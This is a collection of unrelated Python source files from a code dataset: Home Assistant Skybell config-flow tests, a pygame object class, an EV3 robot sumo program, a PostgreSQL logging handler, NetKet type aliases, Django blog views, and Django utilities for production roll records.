domain=DOMAIN,\n data=CONF_CONFIG_FLOW,\n )\n\n entry.add_to_hass(hass)\n\n result = await hass.config_entries.flow.async_init(\n DOMAIN, context={\"source\": SOURCE_USER}, data=CONF_CONFIG_FLOW\n )\n\n assert result[\"type\"] == FlowResultType.ABORT\n assert result[\"reason\"] == \"already_configured\"\n\n\nasync def test_flow_user_cannot_connect(hass: HomeAssistant) -> None:\n \"\"\"Test user initialized flow with unreachable server.\"\"\"\n with _patch_skybell() as skybell_mock:\n skybell_mock.side_effect = exceptions.SkybellException(hass)\n result = await hass.config_entries.flow.async_init(\n DOMAIN, context={\"source\": SOURCE_USER}, data=CONF_CONFIG_FLOW\n )\n assert result[\"type\"] == FlowResultType.FORM\n assert result[\"step_id\"] == \"user\"\n assert result[\"errors\"] == {\"base\": \"cannot_connect\"}\n\n\nasync def test_invalid_credentials(hass: HomeAssistant) -> None:\n \"\"\"Test that invalid credentials throws an error.\"\"\"\n with patch(\"homeassistant.components.skybell.Skybell.async_login\") as skybell_mock:\n skybell_mock.side_effect = exceptions.SkybellAuthenticationException(hass)\n result = await hass.config_entries.flow.async_init(\n DOMAIN, context={\"source\": SOURCE_USER}, data=CONF_CONFIG_FLOW\n )\n\n assert result[\"type\"] == FlowResultType.FORM\n assert result[\"step_id\"] == \"user\"\n assert result[\"errors\"] == {\"base\": \"invalid_auth\"}\n\n\nasync def test_flow_user_unknown_error(hass: HomeAssistant) -> None:\n \"\"\"Test user initialized flow with unreachable server.\"\"\"\n with _patch_skybell_devices() as skybell_mock:\n skybell_mock.side_effect = Exception\n result = await hass.config_entries.flow.async_init(\n DOMAIN, context={\"source\": SOURCE_USER}, data=CONF_CONFIG_FLOW\n )\n assert result[\"type\"] == FlowResultType.FORM\n assert result[\"step_id\"] == \"user\"\n assert result[\"errors\"] == {\"base\": \"unknown\"}\n\n\nasync def test_flow_import(hass: HomeAssistant) -> None:\n \"\"\"Test import step.\"\"\"\n with _patch_skybell(), _patch_skybell_devices(), _patch_setup_entry(), _patch_setup():\n result = await hass.config_entries.flow.async_init(\n DOMAIN, context={\"source\": SOURCE_IMPORT}\n )\n result = await hass.config_entries.flow.async_configure(\n result[\"flow_id\"],\n user_input=CONF_CONFIG_FLOW,\n )\n assert result[\"type\"] == FlowResultType.CREATE_ENTRY\n assert result[\"title\"] == \"user\"\n assert result[\"data\"] == CONF_CONFIG_FLOW\n\n\nasync def test_flow_import_already_configured(hass: HomeAssistant) -> None:\n \"\"\"Test import step already configured.\"\"\"\n entry = MockConfigEntry(\n domain=DOMAIN, unique_id=\"123456789012345678901234\", data=CONF_CONFIG_FLOW\n )\n\n entry.add_to_hass(hass)\n\n with _patch_skybell():\n result = await hass.config_entries.flow.async_init(\n DOMAIN,\n context={\"source\": SOURCE_IMPORT},\n )\n assert result[\"type\"] == FlowResultType.ABORT\n assert result[\"reason\"] == \"already_configured\"\n","sub_path":"tests/components/skybell/test_config_flow.py","file_name":"test_config_flow.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"581186095","text":"from gameobjects.gameobjects import *\nimport pygame\n\n\nclass FixSquid(GameObject):\n def __init__(self, d, position, frame, depth, *tags):\n GameObject.__init__(self, d, Tags.VISIBLE, Tags.UPDATABLE, Tags.PHYSIC, *tags)\n\n self.__frame = frame\n self.__depth = depth\n\n self.activity = Activity(self, None)\n\n self.position = Position(\n owner=self,\n position=position,\n )\n\n\n def update(self, tick):\n pass\n\n\n @property\n def frame(self):\n return self.__frame\n\n @property\n def depth(self):\n return self.__depth","sub_path":"gameobjects/pawns/fixsquid.py","file_name":"fixsquid.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"640269935","text":"#!/usr/bin/python3\r\n\r\nfrom time import sleep\r\nfrom threading import Thread\r\nfrom multiprocessing import Process, Value\r\nimport sys, os\r\n\r\nfrom ev3dev.ev3 import *\r\n\r\n# Will need to check EV3 button state\r\nbtn = Button()\r\n\r\n# Connect motors\r\nrightMotor = LargeMotor(OUTPUT_A)\r\nassert rightMotor.connected, \"Error: Right motor not connected\"\r\nleftMotor = LargeMotor(OUTPUT_D)\r\nassert leftMotor.connected, \"Error: Left motor not connected\"\r\nultraMotor = MediumMotor(OUTPUT_C)\r\nassert ultraMotor.connected, \"Error: Ultra motor not connected\"\r\n\r\n# Connect colour sensor\r\ncolorSensor = ColorSensor()\r\nassert colorSensor.connected, \"Error: Color sensor not connected\"\r\ncolorSensor.mode = \"COL-COLOR\"\r\n\r\n# BASIC FUNCTIONS\r\nCLOCKWISE = 1\r\nANTICLOCKWISE = -1\r\n# To drive\r\ndef drive(left, right, time):\r\n if (time == 0):\r\n leftMotor.run_direct(duty_cycle_sp = -left)\r\n rightMotor.run_direct(duty_cycle_sp = -right)\r\n else:\r\n leftMotor.run_timed(speed_sp=left, time_sp=time * 1000)\r\n rightMotor.run_timed(speed_sp=right, time_sp=time * 1000)\r\n\r\ndef drift():\r\n drive(55, 100, 1)\r\n\r\n# Stops large motors\r\ndef brake():\r\n leftMotor.stop(stop_action='brake')\r\n rightMotor.stop(stop_action='brake')\r\n\r\ndef turn(dir, angle):\r\n \"\"\"\r\n Turn in the direction opposite to the contact.\r\n \"\"\"\r\n\r\n # We want to turn the robot wheels in opposite directions\r\n rightMotor.run_timed(speed_sp=dir*-750, time_sp=250*(angle / 46))\r\n leftMotor.run_timed(speed_sp=dir*750, time_sp=250*(angle / 46))\r\n\r\n # Wait until both motors are stopped:\r\n while any(m.state for m in (leftMotor, rightMotor)):\r\n sleep(0.1)\r\n\r\n\r\n\r\n\r\n# Connect ultrasonic sensor\r\n# https://sites.google.com/site/ev3python/learn_ev3_python/using-sensors\r\n# https://media.readthedocs.org/pdf/ev3dev-lang/latest/ev3dev-lang.pdf\r\nultraSensor = UltrasonicSensor()\r\nassert ultraSensor.connected, \"Error: Ultrasonic sensor not connected\"\r\nultraSensor.mode = \"US-DIST-CM\" # This is actually in millimetres\r\n\r\n# DONE! (don't touch unless you know what you're doing - Lucas)\r\n# Input constants (they don't need to be global after all!)\r\nSEARCH_DISTANCE = 50 # In centimetres\r\nREVOLUTION = 360\r\nSPEED = REVOLUTION * 1 # In degrees per second\r\n\r\n# Output variable\r\nangle_target = Value(\"i\", 0) # The angle (in degrees) that a target was last found at\r\n# 0 = straight ahead, -90 to the left, 90 to the right etc.\r\n\r\n# Initialise the turret process, independent from the main program\r\ndef init_turret(delay):\r\n ultraMotor.reset() # Set the current angle to 0\r\n ultraMotor.stop_action = \"brake\"\r\n # Begin a new process which will run concurrently\r\n p = Process(target=lock_turret, args=(delay, angle_target))\r\n p.daemon = True\r\n p.start() # Initialise process\r\n\r\n# Turret thread\r\n# Thread runs a huge loop to scan for a target within SEARCH_DISTANCE\r\ndef lock_turret(delay, angle):\r\n ultraMotor = MediumMotor(OUTPUT_C)\r\n assert ultraMotor.connected, \"Error: Ultra motor not connected\"\r\n direction = -1 # Scan direction: 1 = clockwise | -1 = anticlockwise\r\n distance = 100 # The distance (in centimetres) output of the ultra sensor\r\n found = False # Whether target has been found\r\n sleep(delay) # Delay to allow operator to move away before turret rotates\r\n ultraMotor.run_forever(speed_sp = direction * SPEED) # Scan to the left\r\n while True: # Huge loop\r\n # Prevent tangling of ultrasonic sensor cable\r\n if (ultraMotor.position > REVOLUTION or ultraMotor.position < -REVOLUTION):\r\n print(\"turret: fix tangle\")\r\n ultraMotor.stop() # Stop further rotation\r\n sleep(0.2) # Delay after stopping\r\n if (ultraMotor.position > 0): # Rotate opposite direction\r\n direction = -1 # Rotate anticlockwise\r\n else:\r\n direction = 1 # Rotate clockwise\r\n ultraMotor.position_sp = direction * REVOLUTION /8\r\n ultraMotor.run_to_abs_pos(speed_sp = SPEED)\r\n while any(ultraMotor.state): # Wait until finished rotating\r\n sleep(0.05)\r\n # Continue rotating (and scanning) in direction\r\n ultraMotor.run_forever(speed_sp = direction * SPEED)\r\n direction *= -1 # Reset to previous direction\r\n # Then keep rotating and scanning for a target within SEARCH_DISTANCE\r\n distance = ultraSensor.value() # Output distance in millimetres\r\n # Found a target! Store in angle\r\n if (distance <= SEARCH_DISTANCE * 10 and found == False):\r\n angle.value = fix_angle(ultraMotor.position)\r\n ultraMotor.stop() # Stop scanning\r\n found = True\r\n # Lost the target - scan the immediate area (within 45 degrees)\r\n elif (distance > SEARCH_DISTANCE * 10 and found == True):\r\n print(\"turret: lost target\")\r\n # Keep scanning briefly in the direction it was scanning before\r\n ultraMotor.position_sp = ultraMotor.position + direction * REVOLUTION /4\r\n ultraMotor.run_to_abs_pos(speed_sp = SPEED)\r\n found = False\r\n while any(ultraMotor.state):\r\n sleep(0.05)\r\n if (distance <= SEARCH_DISTANCE * 10): # Found the target again!\r\n angle.value = fix_angle(ultraMotor.position)\r\n ultraMotor.stop() # Stop scanning\r\n found = True\r\n # The target changed direction, resume scan in the opposite direction\r\n if (found == False): # Couldn't find target\r\n sleep(0.2) # Delay after stopping\r\n direction *= -1 # Switch scan direction and resume scanning\r\n ultraMotor.run_forever(speed_sp = direction * SPEED)\r\n sleep(0.02)\r\n\r\n# Change {-360 <= angle <= 360} to {-180 <= angle <= 180}\r\ndef fix_angle(angle):\r\n # {-180 <= angle <= 180} 270 degrees clockwise = 90 degrees anticlockwise\r\n if (angle < -180):\r\n angle += 360\r\n elif (angle > 180):\r\n angle -= 360\r\n print(\"turret: found target\")\r\n print(\"(target at %d degrees)\" % angle)\r\n return angle\r\n# Can now obtain location of target from angle_target.value\r\n# \r\n\r\n\r\n# Initialise the chase thread, independent from the main program\r\nchase = True\r\ndef init_chase(delay):\r\n t = Thread(target=chase_target, args=(delay,))\r\n t.setDaemon(True)\r\n t.start() # Initialise thread\r\n\r\ndef chase_target(delay):\r\n global chase\r\n last = 0 # Angle the target was last chased at\r\n sleep(delay)\r\n while True:\r\n angle = angle_target.value\r\n # If the robot isn't directly facing the opponent\r\n # stop and straighten up\r\n if (chase == True and (angle <= -15 or angle >= 15) and angle != last):\r\n print(\"chase: chasing target at %d degrees\" % angle)\r\n rightMotor.stop()\r\n leftMotor.stop()\r\n sleep(0.2) # Delay after stopping\r\n if (angle < 0):\r\n # Turn robot clockwise\r\n print(\"chase: turning clockwise\")\r\n turn(CLOCKWISE, angle * -1)\r\n # drive(100, 100, 0)\r\n else:\r\n # Turn robot anticlockwise\r\n print(\"chase: turning anticlockwise\")\r\n turn(ANTICLOCKWISE, angle)\r\n # drive(100, 100, 0)\r\n print(\"chase: finished turning\")\r\n print(\"chase: (target now at %d degrees)\" % angle)\r\n last = angle\r\n # If opponent is straight ahead, charge\r\n if (chase == True and (angle > -15 or angle < 15)):\r\n print(\"drive: locked on target, chasing\")\r\n #drive(100,100, 0)\r\n sleep(0.05)\r\n print(\"(chase: target now at %d degrees)\" % angle)\r\n\r\n\r\ndef start():\r\n print(\"Enter right motor speed then left motor speed.\")\r\n x = 0\r\n y = 0\r\n x = input()\r\n y = input()\r\n x = int(x)\r\n y = int(y)\r\n rightMotor.run_direct(duty_cycle_sp = -x)\r\n leftMotor.run_direct(duty_cycle_sp = -y)\r\n\r\n\r\ndef check_ring():\r\n global chase\r\n colors = (\"unknown\", \"black\", \"blue\", \"green\", \"yellow\", \"red\", \"white\", \"brown\")\r\n if (colorSensor.value() == 1):\r\n chase = False\r\n print(\"black found\")\r\n # Reverse\r\n print(\"drive: reversing\")\r\n #drive(-100, -100, 0)\r\n sleep(1.1)\r\n # Turn\r\n # ((ultraSensor.value() / 10) >= SEARCH_DISTANCE):\r\n #drive(100, 100, 0)\r\n print(\"drive: turning\")\r\n #turn(CLOCKWISE, 180)\r\n #brake()\r\n print(\"check_ring complete\")\r\n chase = True\r\n\r\ndef aesthetics():\r\n # Makes the robot say something\r\n Sound.speak('Exterminate').wait()\r\n sleep(0.5)\r\n Sound.speak('Exterminate').wait()\r\n sleep(1)\r\n Sound.speak('Prepare for doom').wait()\r\n # Is the sound really necessary?\r\n\r\ndef aesthetics_thread():\r\n t = Thread(target=aesthetics)\r\n t.setDaemon(True)\r\n t.start()\r\n\r\n# aesthetics_thread()\r\ninit_turret(0.1) # Begin tracking target after 2 seconds of delay\r\nsleep(3)\r\n# start()\r\ninit_chase(0.1)\r\n# Run the robot until a button is pressed.\r\nwhile not (btn.any()):\r\n check_ring()\r\n\r\n# Stop the motors before exiting.\r\nrightMotor.stop()\r\nleftMotor.stop()\r\nultraMotor.stop()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"505979719","text":"#!/bin/python\n# -*- coding: utf-8 -*-\n# @File : logger.py\n# @Author: wangms\n# @Date : 2018/11/12\nimport logging\nimport psycopg2\nfrom datetime import datetime\n\nclass DBHandler(logging.Handler):\n terminator = '\\n'\n\n def __init__(self):\n super(DBHandler, self).__init__()\n self.conn = psycopg2.connect(host='192.168.1.111', port=5432, dbname='test', user='postgres', password='postgres')\n\n def flush(self):\n self.acquire()\n try:\n self.conn.commit()\n finally:\n self.release()\n\n def emit(self, record):\n try:\n with self.conn.cursor() as cursor:\n cursor.execute(\"\"\"\n insert into dev_python_log(log_time, log_level, file_name, line_no, message) values (%s,%s,%s,%s,%s)\n \"\"\", (datetime.fromtimestamp(record.created), record.levelname,\n record.pathname, record.lineno, record.msg))\n self.flush()\n except Exception:\n self.handleError(record)\n\n def __repr__(self):\n level = logging.getLevelName(self.level)\n return '<%s (%s)>' % (self.__class__.__name__, level)\n\n\ndef fetchLogger():\n logger = logging.getLogger(\"test\")\n logger.setLevel(logging.DEBUG)\n\n stream = logging.StreamHandler()\n format = logging.Formatter(\"%(asctime)s - %(filename)s - %(module)s - %(levelname)s - %(message)s\")\n stream.setFormatter(format)\n logger.addHandler(stream)\n\n db = DBHandler()\n logger.addHandler(db)\n\n return logger\n\n\nif __name__ == '__main__':\n logger = fetchLogger()\n logger.info(\"开始\")\n\n","sub_path":"common/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"523084591","text":"# Copyright 2021 The NetKet Authors - All rights reserved.\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom typing import Any, Sequence, Callable, Union\n\nPRNGKeyT = Any\nSeedT = Union[int, PRNGKeyT]\n\nShape = Sequence[int]\nDType = Any # this could be a real type?\nArray = Any\n\nNNInitFunc = Callable[[PRNGKeyT, Shape, DType], Array]\n\nPyTree = Any\n","sub_path":"netket/utils/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"268484948","text":"from django.shortcuts import render, get_object_or_404\nfrom .models import Post\nfrom django.contrib.auth.models import User\n\ndef front_view(request):\n posts = Post.objects.all()\n context = {\n 'title' : \"blAN 2016\",\n 'posts' : posts,\n }\n return render(request, \"front_page.html\", context=context)\n\ndef post_display(request, url):\n post = get_object_or_404(Post, url=url)\n context = {\n 'title' : post.title,\n 'post' : post,\n }\n return render(request, \"display_post.html\", context=context)","sub_path":"blan/posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"121106515","text":"from producao.models import *\nimport datetime\nfrom django.contrib.sessions.models import Session\nimport pyodbc\n\n\ndef areas(pk):\n bobinagem = Bobinagem.objects.get(pk=pk)\n bobine = Bobine.objects.filter(bobinagem=bobinagem)\n\n # area_g = bobinagem.area_g\n # area_r = bobinagem.area_r\n # area_dm = bobinagem.area_dm\n # area_ind = bobinagem.area_ind\n # area_ba = bobinagem.area_ba\n\n area_g = 0\n area_r = 0\n area_dm = 0\n area_ind = 0\n area_ba = 0\n\n for b in bobine:\n estado = b.estado\n\n if estado == 'G':\n area_g += b.area\n \n elif estado == 'R':\n area_r += b.area\n \n elif estado == 'DM':\n area_dm += b.area\n\n elif estado == 'IND':\n area_ind += b.area\n\n elif estado == 'BA':\n area_ba += b.area\n \n bobinagem.area_g = area_g\n bobinagem.area_r = area_r\n bobinagem.area_dm = area_dm\n bobinagem.area_ind = area_ind\n bobinagem.area_ba = area_ba\n bobinagem.save()\n\ndef update_areas_bobine(pk, estado):\n bobine = Bobine.objects.get(pk=pk)\n bobinagem = bobine.bobinagem\n estado_anterior = estado\n estado_actual = bobine.estado\n\n if estado_actual == estado_anterior:\n pass\n elif estado_anterior == 'LAB' or estado_anterior == 'HOLD':\n if estado_actual == 'G':\n bobinagem.area_g += bobine.area\n elif estado_actual == 'DM':\n bobinagem.area_dm += bobine.area\n elif estado_actual == 'R':\n bobinagem.area_r += bobine.area\n elif estado_actual == 'IND':\n bobinagem.area_ind += bobine.area\n elif estado_actual == 'BA':\n bobinagem.area_ba += bobine.area\n elif estado_anterior == 'G':\n if estado_actual == 'DM':\n bobinagem.area_g -= bobine.area\n bobinagem.area_dm += bobine.area\n elif estado_actual == 'R':\n bobinagem.area_g -= bobine.area\n bobinagem.area_r += bobine.area\n elif estado_actual == 'IND':\n bobinagem.area_g -= bobine.area\n bobinagem.area_ind += bobine.area\n elif estado_actual == 'BA':\n bobinagem.area_g -= bobine.area\n bobinagem.area_ba += bobine.area\n elif estado_actual == 'LAB':\n bobinagem.area_g -= bobine.area\n elif estado_actual == 'HOLD':\n bobinagem.area_g -= bobine.area\n \n elif estado_anterior == 'DM':\n if estado_actual == 'G':\n bobinagem.area_dm -= bobine.area\n bobinagem.area_g += bobine.area\n elif estado_actual == 'R':\n bobinagem.area_dm -= bobine.area\n bobinagem.area_r += bobine.area\n elif estado_actual == 'IND':\n bobinagem.area_dm -= bobine.area\n bobinagem.area_ind += bobine.area\n elif estado_actual == 'BA':\n bobinagem.area_dm -= bobine.area\n bobinagem.area_ba += bobine.area\n elif estado_actual == 'LAB':\n bobinagem.area_dm -= bobine.area\n \n elif estado_actual == 'HOLD':\n bobinagem.area_dm -= bobine.area\n \n\n elif estado_anterior == 'R':\n if estado_actual == 'G':\n bobinagem.area_r -= bobine.area\n bobinagem.area_g += bobine.area\n elif estado_actual == 'DM':\n bobinagem.area_r -= bobine.area\n bobinagem.area_dm += bobine.area\n elif estado_actual == 'IND':\n bobinagem.area_r -= bobine.area\n bobinagem.area_ind += bobine.area\n elif estado_actual == 'BA':\n bobinagem.area_r -= bobine.area\n bobinagem.area_ba += bobine.area\n elif estado_actual == 'LAB':\n bobinagem.area_r -= bobine.area\n \n elif estado_actual == 'HOLD':\n bobinagem.area_r -= bobine.area\n \n\n elif estado_anterior == 'IND':\n if estado_actual == 'G':\n bobinagem.area_ind -= bobine.area\n bobinagem.area_g += bobine.area\n elif estado_actual == 'DM':\n bobinagem.area_ind -= bobine.area\n bobinagem.area_dm += bobine.area\n elif estado_actual == 'R':\n bobinagem.area_ind -= bobine.area\n bobinagem.area_r += bobine.area\n elif estado_actual == 'BA':\n bobinagem.area_ind -= bobine.area\n bobinagem.area_ba += bobine.area\n elif estado_actual == 'LAB':\n bobinagem.area_ind -= bobine.area\n \n elif estado_actual == 'HOLD':\n bobinagem.area_ind -= bobine.area\n \n elif estado_anterior == 'BA':\n if estado_actual == 'G':\n bobinagem.area_ba -= bobine.area\n bobinagem.area_g += bobine.area\n elif estado_actual == 'DM':\n bobinagem.area_ba -= bobine.area\n bobinagem.area_dm += bobine.area\n elif estado_actual == 'R':\n bobinagem.area_ba -= bobine.area\n bobinagem.area_r += bobine.area\n elif estado_actual == 'IND':\n bobinagem.area_ba -= bobine.area\n bobinagem.area_ind += bobine.area\n elif estado_actual == 'LAB':\n bobinagem.area_ba -= bobine.area\n \n elif estado_actual == 'HOLD':\n bobinagem.area_ba -= bobine.area\n \n \n \n bobinagem.save() \n\n \n \ndef bobinagem_create(pk):\n instance = Bobinagem.objects.get(pk=pk)\n if not instance.nome:\n data = instance.data\n data = data.strftime('%Y%m%d')\n map(int, data)\n if instance.perfil.retrabalho == True and instance.num_emendas > 0:\n if instance.num_bobinagem < 10:\n # instance.nome = '3%s-0%s' % (data, instance.num_bobinagem)\n instance.nome = '3%s-0%s' % (data[1:], instance.num_bobinagem)\n\n else:\n instance.nome = '3%s-%s' % (data[1:], instance.num_bobinagem)\n elif instance.perfil.retrabalho == True and instance.num_emendas == 0:\n if instance.num_bobinagem < 10:\n instance.nome = '4%s-0%s' % (data[1:], instance.num_bobinagem)\n else:\n instance.nome = '4%s-%s' % (data[1:], instance.num_bobinagem)\n else:\n if instance.num_bobinagem < 10:\n instance.nome = '%s-0%s' % (data, instance.num_bobinagem)\n else:\n instance.nome = '%s-%s' % (data, instance.num_bobinagem)\n \n instance.save()\n desperdicio(instance.pk) \n if not instance.perfil.retrabalho == True:\n tempo_duracao(instance.pk)\n area_bobinagem(instance.pk) \n create_bobine(instance.pk) \n\ndef bobinagem_create_retrabalho(pk):\n instance = Bobinagem.objects.get(pk=pk)\n if not instance.nome:\n data = instance.data\n data = data.strftime('%Y%m%d')\n map(int, data)\n if instance.num_bobinagem < 10:\n instance.nome = '4%s-0%s' % (data[1:], instance.num_bobinagem)\n else:\n instance.nome = '4%s-%s' % (data[1:], instance.num_bobinagem)\n \n instance.save()\n area_bobinagem(instance.pk) \n create_bobine(instance.pk) \n \n \n \n\ndef create_bobine(pk):\n instance = Bobinagem.objects.get(pk=pk)\n num = 1\n desp_bobine = instance.desper / Decimal(instance.perfil.num_bobines)\n for i in range(instance.perfil.num_bobines):\n lar = Largura.objects.get(perfil=instance.perfil, num_bobine=num)\n bob = Bobine.objects.filter(bobinagem=instance, largura=lar)\n if not bob:\n bob = Bobine.objects.create(bobinagem=instance, largura=lar, comp_actual=instance.comp, comp = instance.comp, artigo=lar.artigo, designacao_prod=lar.designacao_prod, diam=instance.diam, cliente=lar.cliente.nome)\n if num < 10:\n bob.nome = '%s-0%s' % (instance.nome, num)\n else:\n bob.nome = '%s-%s' % (instance.nome, num)\n if bob.bobinagem.estado == 'R':\n bob.estado = 'R' \n elif bob.bobinagem.estado == 'DM':\n bob.estado = 'DM'\n elif bob.bobinagem.estado == 'G':\n bob.estado = 'G'\n elif bob.bobinagem.estado == 'BA':\n bob.estado = 'BA'\n elif bob.bobinagem.estado == 'IND':\n bob.estado = 'IND'\n elif bob.bobinagem.estado == 'SC':\n bob.estado = 'SC'\n else:\n bob.estado = 'LAB'\n\n if instance.tipo_desp == 'R':\n bob.tipo_desp = 'R'\n bob.desp = desp_bobine\n elif instance.tipo_desp == 'BA':\n bob.tipo_desp = 'BA'\n bob.desp = desp_bobine\n\n bob.save() \n area_bobine(bob.pk)\n num += 1\n \n \ndef tempo_duracao(pk):\n instance = Bobinagem.objects.get(pk=pk)\n if instance.inico or instance.fim:\n # if not instance.duracao:\n fim = instance.fim\n fim = fim.strftime('%H:%M')\n inico = instance.inico\n inico = inico.strftime('%H:%M')\n (hf, mf) = fim.split(':')\n (hi, mi) = inico.split(':')\n if hf < hi: \n result = (int(hf) * 3600 + int(mf) * 60) - (int(hi) * 3600 + int(mi) * 60) + 86400\n else:\n result = (int(hf) * 3600 + int(mf) * 60) - (int(hi) * 3600 + int(mi) * 60) \n \n result_str = strftime(\"%H:%M\", gmtime(result))\n instance.duracao = result_str\n instance.save()\n\ndef area_bobinagem(pk):\n instance = Bobinagem.objects.get(pk=pk)\n largura = instance.perfil.largura_bobinagem / 1000\n instance.area = instance.comp_cli * largura\n instance.save()\n\ndef desperdicio(pk):\n instance = Bobinagem.objects.get(pk=pk)\n if instance.comp_par > 0:\n desp = instance.comp - instance.comp_par\n x = instance.comp_par * Decimal('0.05')\n if desp <= x:\n instance.comp_cli = instance.comp\n else: \n instance.comp_cli = instance.comp_par * Decimal('1.05')\n instance.desper = (instance.comp - instance.comp_cli) / 1000 * instance.perfil.largura_bobinagem\n elif instance.comp_par == 0:\n instance.comp_cli = instance.comp\n instance.desper = 0\n instance.save()\n\ndef area_bobine(pk):\n instance = Bobine.objects.get(pk=pk)\n largura = instance.largura.largura / 1000\n instance.area = largura * instance.bobinagem.comp_cli\n instance.save()\n\ndef etiqueta_add_bobine(pk_palete, pk_bobine):\n palete = Palete.objects.get(pk=pk_palete)\n bobine = Bobine.objects.get(pk=pk_bobine)\n e_p = EtiquetaPalete.objects.get(palete=palete)\n bob = [None] * 61\n \n posicao = bobine.posicao_palete\n bob[posicao] = bobine.nome\n if e_p.bobine1 == None or posicao == 1:\n e_p.bobine1 = bob[1]\n elif e_p.bobine2 == None or posicao == 2: \n e_p.bobine2 = bob[2]\n elif e_p.bobine3 == None or posicao == 3: \n e_p.bobine3 = bob[3]\n elif e_p.bobine4 == None or posicao == 4: \n e_p.bobine4 = bob[4]\n elif e_p.bobine5 == None or posicao == 5: \n e_p.bobine5 = bob[5]\n elif e_p.bobine6 == None or posicao == 6: \n e_p.bobine6 = bob[6]\n elif e_p.bobine7 == None or posicao == 7: \n e_p.bobine7 = bob[7]\n elif e_p.bobine8 == None or posicao == 8: \n e_p.bobine8 = bob[8]\n elif e_p.bobine9 == None or posicao == 9: \n e_p.bobine9 = bob[9]\n elif e_p.bobine10 == None or posicao == 10: \n e_p.bobine10 = bob[10]\n elif e_p.bobine11 == None or posicao == 11: \n e_p.bobine11 = bob[11]\n elif e_p.bobine12 == None or posicao == 12: \n e_p.bobine12 = bob[12]\n elif e_p.bobine13 == None or posicao == 13: \n e_p.bobine13 = bob[13]\n elif e_p.bobine14 == None or posicao == 14: \n e_p.bobine14 = bob[14]\n elif e_p.bobine15 == None or posicao == 15: \n e_p.bobine15 = bob[15]\n elif e_p.bobine16 == None or posicao == 16: \n e_p.bobine16 = bob[16]\n elif e_p.bobine17 == None or posicao == 17: \n e_p.bobine17 = bob[17]\n elif e_p.bobine18 == None or posicao == 18: \n e_p.bobine18 = bob[18]\n elif e_p.bobine19 == None or posicao == 19: \n e_p.bobine19 = bob[19]\n elif e_p.bobine20 == None or posicao == 20: \n e_p.bobine20 = bob[20]\n elif e_p.bobine21 == None or posicao == 21: \n e_p.bobine21 = bob[21]\n elif e_p.bobine22 == None or posicao == 22: \n e_p.bobine22 = bob[22]\n elif e_p.bobine23 == None or posicao == 23: \n e_p.bobine23 = bob[23]\n elif e_p.bobine24 == None or posicao == 24: \n e_p.bobine24 = bob[24]\n elif e_p.bobine25 == None or posicao == 25: \n e_p.bobine25 = bob[25]\n elif e_p.bobine26 == None or posicao == 26: \n e_p.bobine26 = bob[26]\n elif e_p.bobine27 == None or posicao == 27: \n e_p.bobine27 = bob[27]\n elif e_p.bobine28 == None or posicao == 28: \n e_p.bobine28 = bob[28]\n elif e_p.bobine29 == None or posicao == 29: \n e_p.bobine29 = bob[29]\n elif e_p.bobine30 == None or posicao == 30: \n e_p.bobine30 = bob[30]\n elif e_p.bobine31 == None or posicao == 31: \n e_p.bobine31 = bob[31]\n elif e_p.bobine32 == None or posicao == 32: \n e_p.bobine32 = bob[32]\n elif e_p.bobine33 == None or posicao == 33: \n e_p.bobine33 = bob[33]\n elif e_p.bobine34 == None or posicao == 34:\n e_p.bobine34 = bob[34]\n elif e_p.bobine35 == None or posicao == 35:\n e_p.bobine35 = bob[35]\n elif e_p.bobine36 == None or posicao == 36:\n e_p.bobine36 = bob[36]\n elif e_p.bobine37 == None or posicao == 37:\n e_p.bobine37 = bob[37]\n elif e_p.bobine38 == None or posicao == 38:\n e_p.bobine38 = bob[38]\n elif e_p.bobine39 == None or posicao == 39:\n e_p.bobine39 = bob[39]\n elif e_p.bobine40 == None or posicao == 40:\n e_p.bobine40 = bob[40]\n elif e_p.bobine41 == None or posicao == 41:\n e_p.bobine41 = bob[41]\n elif e_p.bobine42 == None or posicao == 42:\n e_p.bobine42 = bob[42]\n elif e_p.bobine43 == None or posicao == 43:\n e_p.bobine43 = bob[43]\n elif e_p.bobine44 == None or posicao == 44:\n e_p.bobine44 = bob[44]\n elif e_p.bobine45 == None or posicao == 45:\n e_p.bobine45 = bob[45]\n elif e_p.bobine46 == None or posicao == 46:\n e_p.bobine46 = bob[46]\n elif e_p.bobine47 == None or posicao == 47:\n e_p.bobine47 = bob[47]\n elif e_p.bobine48 == None or posicao == 48:\n e_p.bobine48 = bob[48]\n elif e_p.bobine49 == None or posicao == 49:\n e_p.bobine49 = bob[49]\n elif e_p.bobine50 == None or posicao == 50:\n e_p.bobine50 = bob[50]\n elif e_p.bobine51 == None or posicao == 51:\n e_p.bobine51 = bob[51]\n elif e_p.bobine52 == None or posicao == 52:\n e_p.bobine52 = bob[52]\n elif e_p.bobine53 == None or posicao == 53:\n e_p.bobine53 = bob[53]\n elif e_p.bobine54 == None or posicao == 54:\n e_p.bobine54 = bob[54]\n elif e_p.bobine55 == None or posicao == 55:\n e_p.bobine55 = bob[55]\n elif e_p.bobine56 == None or posicao == 56:\n e_p.bobine56 = bob[56]\n elif e_p.bobine57 == None or posicao == 57:\n e_p.bobine57 = bob[57]\n elif e_p.bobine58 == None or posicao == 58:\n e_p.bobine58 = bob[58]\n elif e_p.bobine59 == None or posicao == 59:\n e_p.bobine59 = bob[59]\n elif e_p.bobine60 == None or posicao == 60:\n e_p.bobine60 = bob[60]\n \n 